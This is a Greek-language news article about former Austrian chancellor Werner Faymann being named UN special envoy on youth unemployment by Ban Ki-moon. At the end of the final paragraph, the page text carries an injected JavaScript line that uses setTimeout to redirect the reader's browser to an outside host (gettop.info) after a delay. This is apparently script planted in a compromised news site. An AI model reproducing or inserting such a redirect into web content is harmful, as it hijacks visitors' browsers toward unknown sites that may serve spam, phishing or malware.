Ο Φάιμαν σε νέα θέση ως εκπρόσωπος του ΟΗΕ για την ανεργία των νέων

0
6

 

Nέα καθήκοντα ως ειδικός εντεταλμένος του ΟΗΕ για την παγκόσμια καταπολέμηση της ανεργίας των νέων αναλαμβάνει τιμητικά από την 1η Σεπτεμβρίου, ο πρώην ομοσπονδιακός καγκελάριος της Αυστρίας και πρώην αρχηγός των Αυστριακών Σοσιαλδημοκρατών Βέρνερ Φάιμαν.

Τη σχετική απόφασή του, για την ανάθεση των καθηκόντων αυτών στον πρώην καγκελάριο, ο οποίος είναι ο πρώτος έως τώρα εντεταλμένος που διορίζεται από τον ΟΗΕ με αντικείμενο την καταπολέμηση της ανεργίας των νέων, είχε ανακοινώσει στα μέσα Αυγούστου ο Γενικός Γραμματέας του διεθνούς οργανισμού Μπαν Κι Μουν, εξαίροντας ιδιαίτερα τον μακρόχρονο και ενεργό ρόλο του Βέρνερ Φάιμαν στο άνοιγμα ευκαιριών για νέους στην αυστριακή αγορά εργασίας.

Σύμφωνα με τον γενικό γραμματέα του ΟΗΕ, ο οποίος υπήρξε στο παρελθόν πρεσβευτής της πατρίδας του, της Νότιας Κορέας, στην Αυστρία, η ανάθεση των καθηκόντων αυτών στον πρώην καγκελάριο γίνεται σε μία εποχή κατά την οποία τα επίμονα υψηλά ποσοστά της ανεργίας των νέων προκαλούν παγκόσμια ανησυχία.
Οι θέσεις εργασίας για νέους συνδέονται συχνά με άσχημες συνθήκες και κακή πληρωμή και θα πρέπει να εντατικοποιηθούν παντού οι προσπάθειες για να δημιουργηθούν οι δυνατότητες αξιοπρεπούς απασχόλησης των νέων, ανέφερε ο Μπαν Κι Μουν.

Ο Βέρνερ Φάιμαν συμμετέχει τιμητικά στην επιτροπή του αποκαλούμενου «Ταμείου του Μέλλοντος» που ασχολείται, μεταξύ άλλων, με ερευνητικά προγράμματα για εγκλήματα της ναζιστικής περιόδου, αλλά και με προγράμματα εναντίον των διακρίσεων και για την προώθηση της ανεκτικότητας.

Ο πρώην ομοσπονδιακός καγκελάριος, ο οποίος είχε παραιτηθεί αιφνιδιαστικά από όλα τα αξιώματά του στις 9 Μαΐου, βρισκόταν επί σχεδόν οκτώ χρόνια επικεφαλής της αυστριακής κυβέρνησης — ο τρίτος σε μακροβιότητα σε αυτό το αξίωμα μεταπολεμικά — και του κόμματός του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here